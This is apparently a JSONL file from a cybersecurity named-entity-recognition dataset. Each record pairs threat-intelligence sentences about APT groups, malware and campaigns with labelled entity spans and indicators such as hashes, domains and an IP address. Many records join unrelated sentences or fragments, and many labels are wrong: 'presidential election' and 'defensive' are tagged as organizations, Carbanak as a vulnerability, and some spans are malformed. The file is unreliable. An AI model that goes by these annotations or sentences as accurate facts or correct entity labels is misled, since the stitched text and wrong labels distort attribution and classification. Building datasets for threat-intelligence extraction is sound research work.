{"text": "Subsequently , the malware will change the screen off time-out to 10 minutes . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations .", "spans": {"Organization: McAfee": [[264, 270]], "Organization: financial organizations": [[345, 368]]}, "info": {"id": "cyberner_stix_valid_000439", "source": "cyberner_stix_valid"}}
{"text": "The attack relied on a spear-phishing email with a subject of “ Defence & Security 2018 Conference Agenda ” that had an attachment with a filename of “ Defence&Security_2018_Conference_Agenda.docx ” .", "spans": {"Indicator: Defence&Security_2018_Conference_Agenda.docx": [[152, 196]]}, "info": {"id": "cyberner_stix_valid_000440", "source": "cyberner_stix_valid"}}
{"text": "What are Google authorization tokens ? Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . Data-flow tracking code was added to detect these use-cases . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": {"Organization: Google": [[9, 15]], "Organization: telecommunications firms": [[237, 261]]}, "info": {"id": "cyberner_stix_valid_000441", "source": "cyberner_stix_valid"}}
{"text": "Overlapping Infrastructure with eSurv Surveillance Cameras The Command & Control domain configured in several of the malicious applications found on Google Play Store , ws.my-local-weather [ . Using data collected from the Trend Micro™ Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers . Writes the decoded payload to C:\\ProgramData\\IntegratedOffice.txt . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": {"System: Google Play Store": [[149, 166]], "Organization: Trend Micro™ Smart Protection Network": [[223, 260]], "Organization: FireEye": [[493, 500]]}, "info": {"id": "cyberner_stix_valid_000442", "source": "cyberner_stix_valid"}}
{"text": "com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo 佐川急便 cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7 While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government . With that method, the malware’s query will traverse the native DNS architecture as opposed to the victim making a direct connection to the . Kaspersky ’s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": {"Organization: Facebook": [[13, 21]], "Organization: Kaspersky ’s Global Research and Analysis Team ( GReAT )": [[670, 726]]}, "info": {"id": "cyberner_stix_valid_000443", "source": "cyberner_stix_valid"}}
{"text": "APT28 has been active since at least January 2007 but received public attention in a major way during 2016 when it was implicated in a series of cyber attacks in the run up to the U.S. presidential election .", "spans": {"Organization: presidential election": [[185, 206]]}, "info": {"id": "cyberner_stix_valid_000444", "source": "cyberner_stix_valid"}}
{"text": "As of November 2015 , this wave of attacks is ongoing .", "spans": {}, "info": {"id": "cyberner_stix_valid_000445", "source": "cyberner_stix_valid"}}
{"text": "Instead of implementing very basic gameplay , the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK . Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information . APT16 . If you ’re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": {"Organization: the government": [[438, 452]], "Organization: military sectors": [[456, 472]]}, "info": {"id": "cyberner_stix_valid_000446", "source": "cyberner_stix_valid"}}
{"text": "The message processing function waits for the WM_DEVICECHANGE event and starts a new thread on its arrival .", "spans": {}, "info": {"id": "cyberner_stix_valid_000447", "source": "cyberner_stix_valid"}}
{"text": "Analysis of Nidiran samples determined that the back door had been updated three times since early 2014 , which fits the timeline outlined in Figure 4 .", "spans": {"Malware: Nidiran": [[12, 19]]}, "info": {"id": "cyberner_stix_valid_000448", "source": "cyberner_stix_valid"}}
{"text": "The IP belongs to the free Russian web hosting service Ucoz . Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service . APT33 : 8.26.21.120 [REDACTED].ddns.net . The videos were quickly passed around offices while users ’ systems were silently infected in the background , and many of the APT ’s components were signed with phony Intel and AMD digital certificates .", "spans": {"Indicator: 8.26.21.120": [[178, 189]], "Indicator: [REDACTED].ddns.net": [[190, 209]]}, "info": {"id": "cyberner_stix_valid_000449", "source": "cyberner_stix_valid"}}
{"text": "Every once in a while , authors leave behind a trace that allows us to attribute not only similar apps , but also multiple different PHA families to the same group or person . To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify . The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively , where [%rand%] is a 4-byte hexadecimal number based on the current timestamp . The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": {"Indicator: igfxHK[%rand%].dat": [[390, 408]], "Indicator: igfxHK[%rand%].exe": [[413, 431]]}, "info": {"id": "cyberner_stix_valid_000450", "source": "cyberner_stix_valid"}}
{"text": "Example of a command that steals specific files from an infected device ’ s application ( top ) , and GolfSpy ’ s parse-and-perform command ( bottom ) Apart from the HTTP POST method , GolfSpy also creates a socket connection to the remote C & C server in order to receive and perform additional commands . Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . This module stores another instance of the GRIFFON implant inside the registry to achieve persistence . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": {"Malware: GolfSpy": [[102, 109], [185, 192]], "Vulnerability: zero-day Adobe Flash Player exploit": [[346, 381]], "Malware: GRIFFON": [[456, 463]]}, "info": {"id": "cyberner_stix_valid_000451", "source": "cyberner_stix_valid"}}
{"text": "Our telemetry for this campaign identified email as the primary delivery mechanism and found the first related samples were distributed in August 2018 . They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt .", "spans": {}, "info": {"id": "cyberner_stix_valid_000452", "source": "cyberner_stix_valid"}}
{"text": "The JavaScript code locates the targeted ads by searching for iframes which contain ads from Google ads infrastructure , as shown in the image below : The fraudulent clicks generate a large revenue for the perpetrators , especially since the malware reached a presumably wide spread . ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . The function GetLocalPcDescrStr is used to compose a large string that contains system information of the target workstation . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"System: Google ads": [[93, 103]], "Organization: Cisco Talos": [[638, 649]], "Organization: PDF reader": [[829, 839]], "Organization: Adobe Acrobat": [[856, 869]]}, "info": {"id": "cyberner_stix_valid_000453", "source": "cyberner_stix_valid"}}
{"text": "The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . security policy in the Eastern Europe and South Caucasus regions .", "spans": {"Organization: financial": [[42, 51]], "Organization: policy organizations": [[56, 76]], "Organization: audiences": [[165, 174]]}, "info": {"id": "cyberner_stix_valid_000454", "source": "cyberner_stix_valid"}}
{"text": "For example , some strains of ransomware abuse accessibility features , a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics . . These servers may be approved , but a compromised network endpoint can be modified to mask the final destination of the server requests originating externally .", "spans": {"Malware: malicious Word documents": [[462, 486]]}, "info": {"id": "cyberner_stix_valid_000455", "source": "cyberner_stix_valid"}}
{"text": "Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse [ . This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Pactchfilepacks.net23.net . checkmail.phpnet.us .", "spans": {"Malware: malware": [[120, 127]], "Indicator: Pactchfilepacks.net23.net": [[250, 275]], "Indicator: checkmail.phpnet.us": [[278, 297]]}, "info": {"id": "cyberner_stix_valid_000456", "source": "cyberner_stix_valid"}}
{"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"Organization: M-Trends": [[8, 16]], "Organization: defensive": [[195, 204]], "Organization: emerging": [[209, 217]], "Indicator: Vietnam.exe": [[341, 352]], "Organization: diaspora": [[412, 420]]}, "info": {"id": "cyberner_stix_valid_000457", "source": "cyberner_stix_valid"}}
{"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex . Removing information : Through it all , our 2023 State of Ransomware equips your organization with the knowledge to counter the hidden mechanics of global ransomware .", "spans": {"Malware: Exodus": [[49, 55]], "Malware: Exodus One": [[113, 123], [164, 174]]}, "info": {"id": "cyberner_stix_valid_000458", "source": "cyberner_stix_valid"}}
{"text": "Using these credentials , the attackers are able to compromise more machines on the network and , from those machines , again obtain more credentials . Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 .", "spans": {"Vulnerability: CVE-2017-8759": [[201, 214]]}, "info": {"id": "cyberner_stix_valid_000459", "source": "cyberner_stix_valid"}}
{"text": "DOWNLOAD AND UPDATE THE TARGET CONFIGURATION FILE By analyzing and decoding the HTTP packets in EventBot Version 0.0.0.1 , we can see that EventBot downloads and updates a configuration file with almost 200 different financial application targets . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros .", "spans": {"Malware: EventBot": [[96, 104], [139, 147]], "Malware: Bemstour": [[249, 257]], "Vulnerability: exploit": [[379, 386]]}, "info": {"id": "cyberner_stix_valid_000460", "source": "cyberner_stix_valid"}}
{"text": "The history of TA505 is instructive because they: Have proven to be highly adaptable , shifting techniques and malware frequently to “ follow the money ” , while largely sticking to successful strategies where possible Are flexible , using largely interchangeable components , innovating where necessary on the malware front and using off-the-shelf malware where possible Operate at massive scale , consistently driving global trends in malware distribution and message volume .", "spans": {}, "info": {"id": "cyberner_stix_valid_000461", "source": "cyberner_stix_valid"}}
{"text": "When the recipient attempted to open the attachment , they would inadvertently execute the file , causing PoisonIvy to be installed .", "spans": {"Malware: PoisonIvy": [[106, 115]]}, "info": {"id": "cyberner_stix_valid_000462", "source": "cyberner_stix_valid"}}
{"text": "The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . At this time , we do not believe that the attackers found a new ASA exploit .", "spans": {"Malware: sample": [[146, 152]], "Vulnerability: CVE-2017-11882": [[172, 186]], "Vulnerability: CVE-2018-0802": [[190, 203]], "Vulnerability: exploit": [[274, 281]]}, "info": {"id": "cyberner_stix_valid_000463", "source": "cyberner_stix_valid"}}
{"text": "The injection method used for winlogon.exe is also interesting and quite unusual . ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) . We can see the familiar DOS stub in plain text , but the rest of the header and binary body are encrypted . We have been documenting it recently and are reporting the abuse to Cloudflare which it uses to hide its real infrastructure .", "spans": {"Organization: ClearSky": [[83, 91]]}, "info": {"id": "cyberner_stix_valid_000464", "source": "cyberner_stix_valid"}}
{"text": "Analysis revealed a consistent first-stage payload of the well-documented Zebrocy Trojan .", "spans": {"Malware: Zebrocy": [[74, 81]], "Malware: Trojan": [[82, 88]]}, "info": {"id": "cyberner_stix_valid_000465", "source": "cyberner_stix_valid"}}
{"text": "] ee Backend server xyz [ . it 's not known if the attackers physically reside in Pakistan . however the assignment is a little bit tricky . Specifically , the exec_signing_id field within the XPdb contains information about the signature of the binary , which can be used to help identify the author of a particular signed binary .", "spans": {}, "info": {"id": "cyberner_stix_valid_000466", "source": "cyberner_stix_valid"}}
{"text": "The samples we analyzed originated from the Philippines . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": {"Malware: samples": [[4, 11]], "Indicator: cmd.exe": [[138, 145]]}, "info": {"id": "cyberner_stix_valid_000467", "source": "cyberner_stix_valid"}}
{"text": "The creation of this malicious document , coming on the same day that the UK government announced an initial agreed draft of the BREXIT agreement , suggests that SNAKEMACKEREL is a group that pays close attention to political affairs and is able to leverage the latest news headlines to develop lure documents to deliver firststage malware , such as Zekapab , to its intended targets .", "spans": {"Malware: Zekapab": [[350, 357]]}, "info": {"id": "cyberner_stix_valid_000468", "source": "cyberner_stix_valid"}}
{"text": "Third , based on the server response , the app can also hide its icon and create a shortcut instead . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . The infrastructure remains up and running at the time of this post .", "spans": {"Malware: decoy documents": [[123, 138]], "Organization: Cambodia Government": [[221, 240]], "Organization: Facebook": [[269, 277]]}, "info": {"id": "cyberner_stix_valid_000469", "source": "cyberner_stix_valid"}}
{"text": "Cybercriminals have become obsessed by this method of illegal earnings : at the beginning of the year we knew only 67 banking Trojans , but by the end of the year there were already 1321 unique samples . Taiwan has been a regular target of cyber espionage threat actors for a number of years . The communication is then handled by the TCP module ( 200 ) , which was previously documented by Kaspersky . In June 2023 , Anonymous Sudan claimed an operation targeting Microsoft services .", "spans": {"Organization: Kaspersky": [[391, 400]], "System: Microsoft services": [[465, 483]]}, "info": {"id": "cyberner_stix_valid_000470", "source": "cyberner_stix_valid"}}
{"text": "Further research is needed to understand the full breadth of this group 's cyber capabilities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000471", "source": "cyberner_stix_valid"}}
{"text": "The organization associated with this certificate is a South Korean mobile software developer .", "spans": {}, "info": {"id": "cyberner_stix_valid_000472", "source": "cyberner_stix_valid"}}
{"text": "If connections to the C&C are blocked or terminated through a firewall , the artifact will be inhibited , as it doesn’t seem to have any fallback protocol .", "spans": {}, "info": {"id": "cyberner_stix_valid_000473", "source": "cyberner_stix_valid"}}
{"text": "APT28 uses a number of tools to compromise its targets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000474", "source": "cyberner_stix_valid"}}
{"text": "t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system .", "spans": {"Organization: Arbor 's ASERT Team": [[182, 201]], "Malware: PlugX": [[288, 293]], "Malware: HTTPBrowser": [[298, 309]]}, "info": {"id": "cyberner_stix_valid_000475", "source": "cyberner_stix_valid"}}
{"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch DoublePulsar is then used to inject a secondary payload , which runs in memory only . Scarlet Mimic is a threat group that has targeted minority rights activists .", "spans": {"Malware: DoublePulsar": [[445, 457]]}, "info": {"id": "cyberner_stix_valid_000476", "source": "cyberner_stix_valid"}}
{"text": ", android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2″ } Data sent to the server [ { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” \\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416 Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads . The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt . Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": {"Organization: individuals and smaller companies": [[825, 858]]}, "info": {"id": "cyberner_stix_valid_000477", "source": "cyberner_stix_valid"}}
{"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[39, 69]], "Vulnerability: CVE-2017-11882": [[70, 84]], "Organization: Microsoft": [[143, 152]], "Organization: HBGary": [[187, 193], [278, 284]], "Malware: Winnti": [[255, 261]], "Organization: video game company": [[312, 330]]}, "info": {"id": "cyberner_stix_valid_000478", "source": "cyberner_stix_valid"}}
{"text": "] comupload101 [ . Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state . A DNS zone represents a collection of FQDNs that end with the same name , and which are usually registered through a domain registration company and controlled by a single owner . Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {}, "info": {"id": "cyberner_stix_valid_000479", "source": "cyberner_stix_valid"}}
{"text": "No one research group has 100% global visibility , and our collected data is presented accordingly .", "spans": {}, "info": {"id": "cyberner_stix_valid_000480", "source": "cyberner_stix_valid"}}
{"text": "While some may dismiss adversary or activity naming as so much marketing , having a distinct label for something allows for clearer communication and more accurate discussion .", "spans": {}, "info": {"id": "cyberner_stix_valid_000481", "source": "cyberner_stix_valid"}}
{"text": "The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"Organization: banking": [[244, 251]], "Organization: bank employees": [[339, 353]]}, "info": {"id": "cyberner_stix_valid_000482", "source": "cyberner_stix_valid"}}
{"text": "It is highly likely that BRONZE PRESIDENT is based in the PRC due to the following observations :", "spans": {"Organization: PRC": [[58, 61]]}, "info": {"id": "cyberner_stix_valid_000483", "source": "cyberner_stix_valid"}}
{"text": "At the time of writing , the dropper supports aepic.dll , sspisrv.dll , ftllib.dll , and userenv.dll to host the malicious FinFisher payload . The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents . Uses AES128 implementation from Crypto++ library for payload decryption . We were able to find additional links between Hack520 ’s “ Pig network ” and the Winnti group ’s activities .", "spans": {"Malware: FinFisher": [[123, 132]], "Organization: social media": [[179, 191]], "Organization: employees": [[222, 231]], "System: Pig network": [[434, 445]]}, "info": {"id": "cyberner_stix_valid_000484", "source": "cyberner_stix_valid"}}
{"text": "Moreover , eSurv was a business unit of Connexxa and was leased to eSurv S.R.L in 2014 . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . MuddyWater is a relatively new APT that surfaced in 2017 .", "spans": {"Organization: eSurv": [[11, 16]], "Organization: Connexxa": [[40, 48]], "Organization: eSurv S.R.L": [[67, 78]], "Organization: CSIS": [[139, 143]], "Vulnerability: Carbanak": [[177, 185]], "Organization: customers": [[215, 224]]}, "info": {"id": "cyberner_stix_valid_000485", "source": "cyberner_stix_valid"}}
{"text": "Similarly , GeminiDuke may also download image files , but these would contain embedded additional configuration information for the toolset itself .", "spans": {"Malware: GeminiDuke": [[12, 22]]}, "info": {"id": "cyberner_stix_valid_000486", "source": "cyberner_stix_valid"}}
{"text": "Next to the features , we expect the target list to be expanded to contain additional ( banking ) apps in the near future . In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"Organization: Secureworks": [[315, 326]], "Vulnerability: CVE-2016-7836": [[438, 451]]}, "info": {"id": "cyberner_stix_valid_000487", "source": "cyberner_stix_valid"}}
{"text": "In such situations , mobile users should always take the utmost precautions while downloading any applications from the internet . Hussarini was first mentioned in APT campaigns targeting the Philippines and Thailand in 2014 . APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries , including , manufacturing , human rights , government , and .", "spans": {}, "info": {"id": "cyberner_stix_valid_000488", "source": "cyberner_stix_valid"}}
{"text": "During our analysis , Downeks created a file in “ Appdata\\Roaming ” containing only “ SD{new line} 0 ” ( “ SD ” possibly for “ SharpDownloader ” ) .", "spans": {"Malware: Downeks": [[22, 29]]}, "info": {"id": "cyberner_stix_valid_000489", "source": "cyberner_stix_valid"}}
{"text": "Older attacks involved a self-extracting archive with a suggestive name , for example : “ Human right report of north Africa under the war . scr ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000490", "source": "cyberner_stix_valid"}}
{"text": "Based upon Cylance 's observations , the Tofu Backdoor was deployed in far fewer instances than the Ham Backdoor . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"Organization: Cylance": [[11, 18]], "Indicator: XLS files": [[175, 184]], "Organization: employees working in the banking sector": [[188, 227]]}, "info": {"id": "cyberner_stix_valid_000491", "source": "cyberner_stix_valid"}}
{"text": "We believe these timestamps to be generated during the compilation of GeminiDuke from the local time of the computer being used .", "spans": {"Malware: GeminiDuke": [[70, 80]]}, "info": {"id": "cyberner_stix_valid_000492", "source": "cyberner_stix_valid"}}
{"text": "It was originally documented on July 25 , 2014 ( or June 22 , 2014 , according to Kaspersky ) and the first campaign we observed in which TA505 distributed Dridex occurred three days later on July 28 .", "spans": {"Organization: Kaspersky": [[82, 91]], "Malware: Dridex": [[156, 162]]}, "info": {"id": "cyberner_stix_valid_000493", "source": "cyberner_stix_valid"}}
{"text": "Types of attacks possibly averted include Structured Query Language ( SQL ) injection , cross-site scripting , and command injection .", "spans": {}, "info": {"id": "cyberner_stix_valid_000494", "source": "cyberner_stix_valid"}}
{"text": "A few months later , in February 2017 , the FBI published a press release revising its estimates and stating that \" Since January 2015 , there has been a 1,300 percent increase in identified exposed losses , now totaling over $3 billion \" Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"Organization: FBI": [[44, 47]], "Organization: Unit 42": [[291, 298]], "Organization: Symantec": [[406, 414]], "Organization: customers": [[517, 526]]}, "info": {"id": "cyberner_stix_valid_000495", "source": "cyberner_stix_valid"}}
{"text": "This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device 's settings . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000496", "source": "cyberner_stix_valid"}}
{"text": "At the beginning of August , Sofacy began a new wave of attacks , focusing on defense-related targets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000497", "source": "cyberner_stix_valid"}}
{"text": "The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday .", "spans": {"Organization: financial": [[61, 70]], "Organization: economic": [[73, 81]], "Organization: trade policy": [[86, 98]], "Malware: GozNym": [[202, 208]], "Organization: banks": [[229, 234]], "Organization: subsidiaries": [[239, 251]], "Organization: Kessem": [[271, 277]], "Organization: Executive Security": [[280, 298]], "Organization: IBM": [[310, 313]]}, "info": {"id": "cyberner_stix_valid_000498", "source": "cyberner_stix_valid"}}
{"text": "Presumably , this was done to make the app seem more credible to targeted users in different countries . This includes Python scripts . Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 .", "spans": {"Organization: Mandiant": [[136, 144]]}, "info": {"id": "cyberner_stix_valid_000499", "source": "cyberner_stix_valid"}}
{"text": "Cybereason Mobile Detecting EventBotCybereason Mobile detecting EventBot . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report .", "spans": {"Organization: Cybereason Mobile": [[0, 17]], "Malware: EventBot": [[64, 72]], "Malware: attachment": [[110, 120]], "Malware: DLL side-loading": [[174, 190]], "Malware: Trojan": [[215, 221]], "Malware: Elise backdoor": [[240, 254]]}, "info": {"id": "cyberner_stix_valid_000500", "source": "cyberner_stix_valid"}}
{"text": "The group was also responsible for the 2016 attack on the World Anti Doping Agency ( WADA ) and the leaking of confidential drug testing information .", "spans": {"Organization: World Anti Doping Agency": [[58, 82]], "Organization: WADA": [[85, 89]]}, "info": {"id": "cyberner_stix_valid_000501", "source": "cyberner_stix_valid"}}
{"text": "In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . The group 's main objective is to steal source codes .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[53, 83]], "Vulnerability: CVE-2017-11882": [[84, 98]]}, "info": {"id": "cyberner_stix_valid_000502", "source": "cyberner_stix_valid"}}
{"text": "Upon execution , KASPERAGENT drops the payload and a decoy document that displays Arabic names and ID numbers .", "spans": {"Malware: KASPERAGENT": [[17, 28]]}, "info": {"id": "cyberner_stix_valid_000503", "source": "cyberner_stix_valid"}}
{"text": "EventBot Dropped XML configuration files Dropped XML configuration files on the device . Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations .", "spans": {"Malware: EventBot": [[0, 8]], "Malware: Margarita": [[122, 131]], "Malware: SHAPESHIFT": [[259, 269]]}, "info": {"id": "cyberner_stix_valid_000504", "source": "cyberner_stix_valid"}}
{"text": "VOODOO BEAR is a highly advanced adversary with a suspected nexus to the Russian Federation . Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": {"Malware: GandCrab": [[137, 145]], "Organization: customers": [[186, 195]], "Organization: IT support firms": [[206, 222]]}, "info": {"id": "cyberner_stix_valid_000505", "source": "cyberner_stix_valid"}}
{"text": "It is possible to decompile the deobfuscated sample and retrieve most of the original source code but not enough to compile it easily .", "spans": {}, "info": {"id": "cyberner_stix_valid_000506", "source": "cyberner_stix_valid"}}
{"text": "On 27th February , Kaspersky and CrySyS Lab published research on this previously unidentified malware family , dubbing it MiniDuke .", "spans": {"Organization: Kaspersky": [[19, 28]], "Organization: CrySyS Lab": [[33, 43]], "Malware: MiniDuke": [[123, 131]]}, "info": {"id": "cyberner_stix_valid_000507", "source": "cyberner_stix_valid"}}
{"text": "The multiple vulnerabilities in these older systems provide cyber actors many targets for exploitation .", "spans": {}, "info": {"id": "cyberner_stix_valid_000508", "source": "cyberner_stix_valid"}}
{"text": "Step 1 : Download Bank Austria Security App Download the Bank Austria security app to your Android device . Sea Turtle have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs . APT33 Elfin APT33 is a suspected Iranian threat group that has carried out operations since at least 2013 .", "spans": {"System: Bank Austria Security App": [[18, 43]], "Organization: DNS registries": [[172, 186]], "Organization: number of registrars": [[193, 213]]}, "info": {"id": "cyberner_stix_valid_000509", "source": "cyberner_stix_valid"}}
{"text": "As a result of the long-term development process , there are multiple , exceptional capabilities : usage of multiple exploits for gaining root privileges , a complex payload structure , never-before-seen surveillance features such as recording surrounding audio in specified locations . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets .", "spans": {"Malware: LOWBALL": [[412, 419]], "Malware: BUBBLEWRAP": [[514, 524]]}, "info": {"id": "cyberner_stix_valid_000510", "source": "cyberner_stix_valid"}}
{"text": "In doing so , users can mistakenly install malicious apps , such as the spyware mentioned in this blog . Xagent – A variant of JbossMiner Mining Worm” – a worm written in Python and compiled using PyInstaller for both Windows and Linux platforms . Group5 has used two commonly available remote access tools ( RATs ) , njRAT S-MAL and NanoCore , as well as an Android RAT , DroidJack .", "spans": {"Malware: remote access tools": [[287, 306]], "Malware: RATs": [[309, 313]], "Malware: , njRAT S-MAL and NanoCore": [[316, 342]], "Malware: Android RAT": [[359, 370]], "Malware: DroidJack": [[373, 382]]}, "info": {"id": "cyberner_stix_valid_000511", "source": "cyberner_stix_valid"}}
